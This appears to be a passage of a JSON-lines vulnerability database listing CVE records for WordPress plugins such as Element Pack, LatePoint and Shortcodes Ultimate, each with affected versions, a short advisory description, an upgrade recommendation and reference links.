wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66b669ce-142a-48b8-9adf-620657c2db74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0080","slug":"customer-reviews-woocommerce","versionEndExcluding":"5.16.0","description":"The Customer Reviews for WooCommerce WordPress plugin before 5.16.0 does not validate one of its shortcode attribute, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non PHP files and retrieve their content. RCE could also be achieved if the attacker manage to upload a malicious image containing PHP code, and then include it via the affected attribute, on a default WP install, authors could easily achieve that given that they have the upload_file capability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b0d63ed-e244-4f20-8f10-a6e0c7ccadd4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b0d63ed-e244-4f20-8f10-a6e0c7ccadd4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1206","slug":"adrotate","versionImpact":"5.13.2","versionEndExcluding":"5.13.3","description":"The AdRotate Banner Manager \u2013 The only ad manager you'll need plugin for WordPress is vulnerable to arbitrary file uploads due to missing file extension sanitization in the adrotate_insert_media() function in all versions up to, and including, 5.13.2. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files with double extensions on the affected site's server which may make remote code execution possible. This is only exploitable on select instances where the configuration will execute the first extension present.","recommendation":"Update to version 5.13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f92219a-e07e-422d-a9f2-dbe4fbcd5f55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f92219a-e07e-422d-a9f2-dbe4fbcd5f55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adrotate\\\/trunk\\\/adrotate-admin-manage.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adrotate\\\/trunk\\\/adrotate-admin-manage.php#L418\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0911","slug":"shortcodes-ultimate","versionEndExcluding":"5.12.8","description":"The WordPress Shortcodes Plugin \u2014 Shortcodes Ultimate WordPress plugin before 5.12.8 does not validate the user meta to be retrieved via the user shortcode, allowing any authenticated users such as subscriber to retrieve arbitrary user meta (except the user_pass), such as the user email and activation key by default.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35404d16-7213-4293-ac0d-926bd6c17444\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35404d16-7213-4293-ac0d-926bd6c17444\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0890","slug":"shortcodes-ultimate","versionEndExcluding":"5.12.8","description":"The WordPress Shortcodes Plugin \u2014 Shortcodes Ultimate WordPress plugin before 5.12.8 does not ensure that posts to be displayed via some shortcodes are already public and can be accessed by the user making the request, allowing any authenticated users such as subscriber to view draft, private or even password protected posts. It is also possible to leak the password of protected posts","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a466f15-f112-4527-8b02-4544a8032671\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a466f15-f112-4527-8b02-4544a8032671\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5292","slug":"bdthemes-element-pack-lite","versionImpact":"5.11.2","versionEndExcluding":"5.11.3","description":"The Element Pack Addons for Elementor \u2013 Best Elementor addons with Ready Templates, Blocks, Widgets and WooCommerce Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'marker_content\u2019 parameter in all versions up to, and including, 5.11.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.11.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302152\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302152\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8dfdd8-820c-4066-8014-2cb5b9f935a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8dfdd8-820c-4066-8014-2cb5b9f935a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13464","slug":"library-bookshelves","versionImpact":"5.10","versionEndExcluding":"5.11","description":"The Library Bookshelves plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bookshelf' shortcode in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/trunk\\\/functions.php#L681\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/trunk\\\/functions.php#L681\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6b75ae7-89d9-4dd4-85c1-c12369bd86c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6b75ae7-89d9-4dd4-85c1-c12369bd86c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9058","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.5","versionEndExcluding":"5.10.6","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Lightbox widget in all versions up to, and including, 5.10.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189994\\\/bdthemes-element-pack-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189994\\\/bdthemes-element-pack-lite\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e343ea3-996c-47c7-9480-e6264cbded98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e343ea3-996c-47c7-9480-e6264cbded98?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1458","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.29","versionEndExcluding":"5.10.30","description":"The Element Pack Addons for Elementor \u2013 Free Templates and Widgets for Your WordPress Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets like Dual Button, Creative Button, Image Stack and more in all versions up to, and including, 5.10.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3277466%40bdthemes-element-pack-lite&new=3277466%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3277466%40bdthemes-element-pack-lite&new=3277466%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbd3170-a45b-4ae6-bc59-4cfb92f6c2a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbd3170-a45b-4ae6-bc59-4cfb92f6c2a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9867","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Open Map Widget' marker_content parameter in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca2bd96-ac3c-480c-8fe7-fb5227a093ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca2bd96-ac3c-480c-8fe7-fb5227a093ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9657","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tooltip' parameter in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eb77e9-7e0b-4134-9cb6-30ba78f6a686?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eb77e9-7e0b-4134-9cb6-30ba78f6a686?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-tooltip.js#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-tooltip.js#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-reading-timer.js#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-reading-timer.js#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-logo-grid.js#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-logo-grid.js#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-image-stack.js#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-image-stack.js#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.js#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.js#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10493","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) WordPress plugin before 5.10.3 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e7f7196-054b-4cfd-9219-c60bb8275e8d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e7f7196-054b-4cfd-9219-c60bb8275e8d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10980","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) WordPress plugin before 5.10.3 does not validate and escape some of its Cookie Consent block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915daad8-d14c-4457-a3a0-aa21744f4ae0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915daad8-d14c-4457-a3a0-aa21744f4ae0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1457","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.28","versionEndExcluding":"5.10.29","description":"The Element Pack Addons for Elementor \u2013 Free Templates and Widgets for Your WordPress Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Wrapper Link, Countdown and Gallery widgets in all versions up to, and including, 5.10.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1095\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1095\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1097\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1097\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6ac5484-3caa-4821-990b-cd49c2c4873d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6ac5484-3caa-4821-990b-cd49c2c4873d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9868","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.1","versionEndExcluding":"5.10.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Age Gate Widget 'url' parameter in all versions up to, and including, 5.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94efdb07-653b-4838-b584-e45e9ab9b7a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94efdb07-653b-4838-b584-e45e9ab9b7a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/age-gate\\\/widgets\\\/age-gate.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/age-gate\\\/widgets\\\/age-gate.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10310","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.1","versionEndExcluding":"5.10.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Gallery Widget 'image_title' parameter in all versions up to, and including, 5.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/144d755a-e61a-4ecd-9d9a-9c6e3a1e6ea2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/144d755a-e61a-4ecd-9d9a-9c6e3a1e6ea2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12851","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.14","versionEndExcluding":"5.10.15","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom_attributes parameter of the Cookie Consent Widget in all versions up to, and including, 5.10.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212890%40bdthemes-element-pack-lite&new=3212890%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212890%40bdthemes-element-pack-lite&new=3212890%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b0af74-f773-4a56-b169-2ee11e923813?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b0af74-f773-4a56-b169-2ee11e923813?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11852","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.12","versionEndExcluding":"5.10.13","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_layouts() function in all versions up to, and including, 5.10.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a detailed listing of layout templates.","recommendation":"Update to version 5.10.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/includes\\\/template-library\\\/editor\\\/manager\\\/api.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/includes\\\/template-library\\\/editor\\\/manager\\\/api.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3208986%40bdthemes-element-pack-lite%2Ftrunk&old=3204020%40bdthemes-element-pack-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3208986%40bdthemes-element-pack-lite%2Ftrunk&old=3204020%40bdthemes-element-pack-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6715","slug":"latepoint","versionImpact":"5.1.93","versionEndExcluding":"5.1.94","description":"The LatePoint  WordPress plugin before 5.1.94 is vulnerable to Local File Inclusion via the layout parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 5.1.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3769","slug":"latepoint","versionImpact":"5.1.92","versionEndExcluding":"5.1.93","description":"The LatePoint \u2013 Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.92 via the 'view_booking_summary_in_lightbox' due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to retrieve appointment details such as customer names and email addresses.","recommendation":"Update to version 5.1.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latepoint\\\/trunk\\\/lib\\\/controllers\\\/customer_cabinet_controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latepoint\\\/trunk\\\/lib\\\/controllers\\\/customer_cabinet_controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3291162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3291162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e9acd26-c341-4ece-bcf1-102f953a4b4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e9acd26-c341-4ece-bcf1-102f953a4b4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3601","slug":"poll-maker","versionImpact":"5.1.8","versionEndExcluding":"5.1.9","description":"The Poll Maker \u2013 Best WordPress Poll Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_poll_create_author function in all versions up to, and including, 5.1.8. This makes it possible for unauthenticated attackers to extract email addresses by enumerating them one character at a time.","recommendation":"Update to version 5.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0505a1-c7c4-4cf1-97cd-123a4dddcea3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0505a1-c7c4-4cf1-97cd-123a4dddcea3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071296%40poll-maker&new=3071296%40poll-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071296%40poll-maker&new=3071296%40poll-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4810","slug":"dk-pricr-responsive-pricing-table","versionEndExcluding":"5.1.8","description":"The Responsive Pricing Table WordPress plugin before 5.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 5.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/portswigger.net\\\/web-security\\\/cross-site-scripting\\\/stored\",\"name\":\"https:\\\/\\\/portswigger.net\\\/web-security\\\/cross-site-scripting\\\/stored\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfde5436-dd5c-4c70-a9c2-3cb85cc99c0a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfde5436-dd5c-4c70-a9c2-3cb85cc99c0a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12329","slug":"essential-real-estate","versionImpact":"5.1.6","versionEndExcluding":"5.1.7","description":"The Essential Real Estate plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on several pages\/post types in all versions up to, and including, 5.1.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to access invoices and transaction logs","recommendation":"Update to version 5.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204549%40essential-real-estate&new=3204549%40essential-real-estate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204549%40essential-real-estate&new=3204549%40essential-real-estate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa5b1bf3-344e-4ae6-87b9-2dcaafd417a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa5b1bf3-344e-4ae6-87b9-2dcaafd417a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
